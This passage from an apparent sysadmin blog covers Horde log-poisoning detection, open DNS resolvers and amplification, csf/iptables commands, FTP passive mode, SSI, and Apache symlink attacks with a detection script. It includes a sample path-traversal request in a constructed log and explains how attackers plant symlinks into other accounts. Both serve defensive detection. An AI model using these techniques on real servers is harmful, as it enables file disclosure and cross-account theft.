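198.51.100.7 - - [17/Jan/2012:08:01:20 -0500] "GET /horde/util/barcode.php?type=code39&code=12345 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Jan/2012:08:01:35 -0500] "GET /horde/util/barcode.php?type=../../../../../../../../var/log/psa-horde/psa-horde.log HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
EOF

horde_ioc_scan "$horde_log" "$access_log"   # reports both indicators, returns 1
```

A legitimate barcode request (the code39 line) is not flagged; only a type parameter that climbs out of the barcode directory is. A hit on the poisoning check alone already means the log file is a loaded gun, so rotate it out even if the traversal request has not been seen yet.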

Open resolvers !!

What is an open resolver?

Before getting to know what an open resolver is, you need to know what
recursion, i.e. a recursive query, is.

Suppose you have a DNS server configured and a local machine which uses
your DNS server queries for a website. Imagine this query is a new one 
and its not in the local cache of the machine which made the request.
Once this request reaches your DNS server, it will attempt to find the
website in question in its local cache. If it cannot find an answer it
will query other DNS servers on your behalf until it finds the address.
It will then respond to the original request with the results from each
server’s query.

This scenario is fine, because the local machine which made the initial
request is trusted by you.

What if another machine, one you do not trust, queries your DNS server for
the same thing and gets the same service? Then your DNS server is an open resolver.

An open DNS resolver is a name server that provides a recursive name resolution
for non local clients or users. Basically it’s a name server that provides recursive
replies for every system on the internet. Local users or “authorized” clients are
users on networks that you control and/or that you trust. Recursive replies are
the result of following the chain of delegations found in DNS, ending up at the
domain name that was requested by the original user.

Open DNS resolvers are frequently abused to conduct efficient DDoS attacks on
websites, infrastructure and services. In a DNS amplification attack, the
attacker sends a DNS lookup request to an open resolver with the source
address spoofed to be the victim's address.

When the DNS server sends its response, it goes to the victim (the source
address that was used in the spoofed request). Because the response is
typically much larger than the request, the attacker amplifies the volume of
traffic directed at the victim. Don't think it affects just the victim:
your equipment is effectively taking part in a botnet running a DDoS attack
on other systems, potentially causing disruption of services and harm.

If your systems take part in such an attack, your own network, server and
service infrastructure can easily become congested too.

To get around this, configure your DNS server either to disable recursion
entirely (right for a server that is only authoritative for your zones) or to
allow recursion only from a trusted set of IPs.

Recursion can be disabled by adding the following to the options block of
/etc/named.conf:

options {
    recursion no;
};

You can allow recursion from a trusted set of IPs instead with the following.
Include your own server IPs, your provider's name server IPs and whichever
other IPs you trust; in BIND 9.4 and later allow-query-cache follows
allow-recursion by default, so cached answers are withheld from everyone
else as well:

options {
    allow-recursion { 127.0.0.1; IP1; IP2; };
};

Suppose you have a DNS server and have configured named with

allow-recursion { IP1; IP2; };

Try the following from the machine with IP1,

# nslookup google.com x.x.x.x ( x.x.x.x is the DNS server IP )

and you get google.com's addresses, the normal answer.

Make the same query from an IP that is not listed in allow-recursion and you
get one of the following instead. On older BIND versions, only a referral to
the root servers, with no answer:

-----------

(root) nameserver = J.ROOT-SERVERS.NET
(root) nameserver = K.ROOT-SERVERS.NET
(root) nameserver = L.ROOT-SERVERS.NET
(root) nameserver = M.ROOT-SERVERS.NET
(root) nameserver = A.ROOT-SERVERS.NET
(root) nameserver = B.ROOT-SERVERS.NET
(root) nameserver = C.ROOT-SERVERS.NET
(root) nameserver = D.ROOT-SERVERS.NET
(root) nameserver = E.ROOT-SERVERS.NET
(root) nameserver = F.ROOT-SERVERS.NET
(root) nameserver = G.ROOT-SERVERS.NET
(root) nameserver = H.ROOT-SERVERS.NET
(root) nameserver = I.ROOT-SERVERS.NET

…..

-----------

On current BIND versions, a refusal:

----------

Server: x.x.x.x
Address: x.x.x.x#53

** server can't find google.com: REFUSED

----------

Either way the server did not resolve the name on behalf of the untrusted
client, which is what you want.

So, consider tweaking your DNS server if it is an open resolver!
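The nslookup output above varies with the BIND version; a more reliable way to test a server from outside is to look at the flags in dig's answer. As an added example (not from the post), the shell functions below classify dig output: 'ra' in the flags line together with a NOERROR answer means the server recursed for you (open); REFUSED, or a reply without 'ra' such as the old-style root referral, means it did not (closed). The two dig outputs are constructed in dig's format; check_resolver runs the real dig against a server you name.

```shell
#!/bin/sh
# Added example: classify a name server as open/closed from dig output.
# Not from the original post. The sample outputs below are constructed.

# classify_dig_output < dig-output -> prints one of: open closed no-response unknown
classify_dig_output() {
    out=$(cat)
    [ -z "$out" ] && { echo no-response; return; }
    case "$out" in *"timed out"*) echo no-response; return ;; esac
    status=$(printf '%s\n' "$out" | sed -n 's/.*status: \([A-Z]*\),.*/\1/p' | head -n 1)
    flags=$(printf '%s\n' "$out" | sed -n 's/^;; flags: \([^;]*\);.*/\1/p' | head -n 1)
    answers=$(printf '%s\n' "$out" | sed -n 's/.*ANSWER: \([0-9]*\),.*/\1/p' | head -n 1)
    case " $flags " in
        *" ra "*)
            # recursion available to us and the name got resolved: open resolver
            if [ "$status" = NOERROR ] && [ "${answers:-0}" -gt 0 ]; then echo open; else echo unknown; fi ;;
        *)
            # no 'ra': the server refused, or only handed out a referral
            if [ "$status" = REFUSED ] || [ -n "$flags" ]; then echo closed; else echo unknown; fi ;;
    esac
}

# check_resolver SERVER [NAME] -> query a name the server is not authoritative for.
check_resolver() {
    dig "@$1" "${2:-google.com}" A +time=3 +tries=1 2>/dev/null | classify_dig_output
}

# Constructed dig output from an open resolver ...
open_sample='; <<>> DiG 9.8.2 <<>> @192.0.2.53 google.com A
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4711
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; ANSWER SECTION:
google.com.  300 IN A 192.0.2.80'
# ... and from one that restricts recursion.
closed_sample='; <<>> DiG 9.8.2 <<>> @192.0.2.54 google.com A
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 4712
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0'

printf '%s\n' "$open_sample"   | classify_dig_output   # open
printf '%s\n' "$closed_sample" | classify_dig_output   # closed
# Against a live server: check_resolver x.x.x.x
```

Run check_resolver from a host that is not in your allow-recursion list; from a trusted address the answer is 'open' by design.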

csf & iptables cheatsheet !!

CSF

csf -a   : allow an ip and add it to /etc/csf/csf.allow
csf -ar  : remove an ip from /etc/csf/csf.allow and delete the rule
csf -d   : deny an ip and add it to /etc/csf/csf.deny
csf -dr  : unblock an ip and remove it from /etc/csf/csf.deny
csf -g   : search the rules and show the one that matches the ip
csf -t   : list the temporary bans
csf -tr  : remove an ip from the temporary bans
csf -x   : disable csf and lfd
csf -e   : enable csf and lfd if disabled
csf -r   : restart csf (reloads the rules)

CSF config files

  • /etc/csf/csf.conf     :csf config file
  • /etc/csf/csf.allow    :csf allow file
  • /etc/csf/csf.deny     :csf deny file
  • /etc/csf/csf.ignore   :ignore list file ( the ip’s lfd should ignore and not block )
  • /etc/csf/csf.tempban  :to see the ips in temporary ban

To block every IP range belonging to a country

Open the csf config file, find the line "CC_DENY" and add the corresponding country code.

For example, to block IPs from China, add the country code 'CN'. This relies
on the GeoIP data csf downloads and adds a large rule set, so use it sparingly.

IPTABLES

service iptables status : display the status of the firewall
iptables -F : flush all rules (on a csf server this removes csf's rules too; run csf -r to restore them)
iptables -L INPUT -n : list the rules of the INPUT chain with numeric addresses
iptables -I INPUT -s x.x.x.x -j DROP   : block a single ip address
iptables -D INPUT -s x.x.x.x -j DROP   : delete that rule again
iptables -A INPUT -s x.x.x.x -j ACCEPT : allow all traffic from the ip address
iptables -A INPUT -p tcp --dport 3306 -j DROP : block a port from all ips
iptables -A INPUT -p tcp -s x.x.x.x --dport 3306 -j ACCEPT : allow a port from a single ip (insert it before the DROP; rules match in order)
iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP :
block traffic from a mac address (only meaningful for hosts on the same
network segment, as the source mac is that of the last hop)

Diff b/w DROP and REJECT : REJECT works like DROP, but will return an error
message to the host sending the packet that the packet was blocked

iptables-save > /root/rule.file : save the iptables rules to a file
iptables-restore < /root/rule.file : restore the rules from that file

iptables -L INPUT --line-numbers : list the rules of the chain 'INPUT' with their rule numbers
iptables -D INPUT 1 : delete rule 1 of the chain INPUT

Passive mode FTP !

Enable the passive port range for Pure-FTPd !!

Before that, an overview of different modes for an FTP connection.

File Transfer Protocol (FTP) has two modes for the data connection: active and passive. In active mode the client opens the control connection and the server then opens the data connection back to the client, from its port 20 to a port the client announced; client-side firewalls and NAT usually block that. In passive mode the client initiates both connections: the server announces a port from its passive range and the client connects to it, which is why that range has to be fixed and opened in the firewall.

Now, to enable passive mode and its range,

* Open the /etc/pure-ftpd.conf configuration file in your preferred text editor.
* Remove the comment (#) from the beginning of the line which contains the PassivePortRange option.
* Change that line to the following:

PassivePortRange 49152 65534 ( indicate the range here )

* Save the changes to the configuration file.
* Run the /usr/local/cpanel/scripts/restartsrv_ftpserver command to restart the server.

Remember to open these ports in the firewall (with csf, add the range to TCP_IN in /etc/csf/csf.conf and restart csf); otherwise passive transfers hang right after the directory listing command.

Options +Includes — what is it ?

What is the option seen as Options +Includes ??

SSI (Server Side Includes) are directives that are placed in HTML pages, and evaluated on the
server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.

The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served.

SSI is a great way to add small pieces of information, such as the current time.

To permit SSI on your server, you must have the following directive either in your httpd.conf file, or in a .htaccess file:

Options +Includes

On a shared server prefer Options +IncludesNOEXEC, which allows includes but
disables the #exec element, so that a user's page cannot run arbitrary
commands as the web server. Only files mapped to the INCLUDES output filter
(for example .shtml) are parsed, so the directive alone does not make every
HTML file dynamic.

Issue with Apache and SymLinks

The symlink vulnerability with Apache is a known issue in a shared hosting
environment.

The attacker's first step is to find a single compromised website or domain,
one that runs a vulnerable script, third-party application or theme. Once he
has access to that one domain, he creates symlinks to other customers'
websites, or even to / (root).

For example, if the following symlink exists in any domain,

link -> /root , then by browsing to the directory 'link' anyone can reach
/root and any sensitive file under it. Apache follows the link and reads the
target as the web server user, so anything that user can read (world-readable
configuration files in other accounts' homes, for instance) is exposed.

Rather than creating such symlinks by hand, the attacker can use any
perl/cgi script to create symlinks to the other users of the server.

As a basic solution, make sure Apache is configured so as not to follow
symlinks (Options -FollowSymLinks).

================

To stop Apache following symbolic links in users' requests, remove the FollowSymLinks option from your Directory blocks.

For example, if this was the configuration,

<Directory "/usr/local/apache/htdocs">
Options Indexes FollowSymLinks
AllowOverride None
Order allow,deny
Allow from all
</Directory>

remove the FollowSymLinks reference so that it reads:

<Directory "/usr/local/apache/htdocs">
Options Indexes
AllowOverride None
Order allow,deny
Allow from all
</Directory>

================

If you really need symlinks, use the "SymLinksIfOwnerMatch" option instead,
which only follows a link whose owner matches the owner of the target. Sites
that use mod_rewrite in .htaccess need one of the two options, so
SymLinksIfOwnerMatch is usually the practical choice. Note that Apache's own
documentation points out the owner check is subject to a race condition, so
it narrows the problem rather than eliminating it.

To prevent PHP from accessing any file outside a user's directory, set the
'open_basedir' directive (in the PHP configuration file) so that each
account only has access to its own directory.

This option can be enabled from WHM, but :

==========

This security tweak uses Apache DSO style directives. If PHP is
configured to run as a CGI, SuPHP or
FastCGI process, the open_basedir setting must be manually specified
in the relevant php.ini file.
See the EasyApache documentation for more information.

==========

If the PHP handler is CGI or suPHP, the Tweak Settings option in WHM cannot
be used to set open_basedir.

You have to specify open_basedir yourself in the global PHP configuration
file ( use php -i | grep php.ini to find its location ), or per account in
that account's php.ini.

In addition, there are various patches against this symlink attack:

https://forums.cpanel.net/f185/solutions-handling-symlink-attacks-202242-p4.html#post996441

To be kept in mind: the root cause of this attack is an insecure
script/plugin/application employed in one of the domains, which is how the
attacker gets to create the symlinks in the first place. Auditing home
directories for symlinks that point outside the owner's home is a quick way
to find out whether it has already happened.
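As an added example (not from the post or from the cPanel thread linked above), the shell functions below walk a home directory and list every symlink whose resolved target lies outside that home, which is exactly what the attack described above plants. They rely on find and readlink -f from GNU coreutils; the directory tree used here is constructed under a temporary directory, and scanning every account is a loop over /home/*.

```shell
#!/bin/sh
# Added example: find symlinks under a home directory that escape it.
# Not from the original post. Needs GNU find/readlink (readlink -f).

# Print "link -> target" for each symlink under DIR whose resolved target is
# outside DIR (dangling links are reported with their would-be target).
escaping_symlinks() {
    base=$(readlink -f "$1") || return 2
    find "$base" -type l -print 2>/dev/null | while IFS= read -r link; do
        target=$(readlink -f "$link" 2>/dev/null) || target="?"
        case "$target" in
            "$base"|"$base"/*) ;;                       # stays inside the tree
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# scan_home DIR -> 0 if clean, 1 if escaping symlinks were found (listed on stdout).
scan_home() {
    list=$(escaping_symlinks "$1") || return 2
    if [ -z "$list" ]; then
        echo "clean: $1"
        return 0
    fi
    echo "escaping symlinks under $1:"
    printf '%s\n' "$list"
    return 1
}

# Constructed tree: alice's account holds one harmless link and two that
# reach into bob's home and into /etc.
demo=$(mktemp -d)
mkdir -p "$demo/home/alice/public_html" "$demo/home/bob"
echo "DB_PASSWORD=secret" > "$demo/home/bob/wp-config.php"
ln -s "$demo/home/alice/public_html"  "$demo/home/alice/www"             # inside: fine
ln -s "$demo/home/bob/wp-config.php"  "$demo/home/alice/public_html/cfg"  # escapes
ln -s /etc/passwd                     "$demo/home/alice/public_html/pw"   # escapes

scan_home "$demo/home/alice"     # lists cfg and pw, returns 1
scan_home "$demo/home/bob"       # clean, returns 0

# On a real server, as root:  for h in /home/*; do scan_home "$h"; done
```

Links that point outside the home are not always malicious (a mail or backup path, for example), so review the list rather than deleting blindly; a link that resolves into another account's home or into /root or /etc, created from a web-writable directory, is the signature to act on.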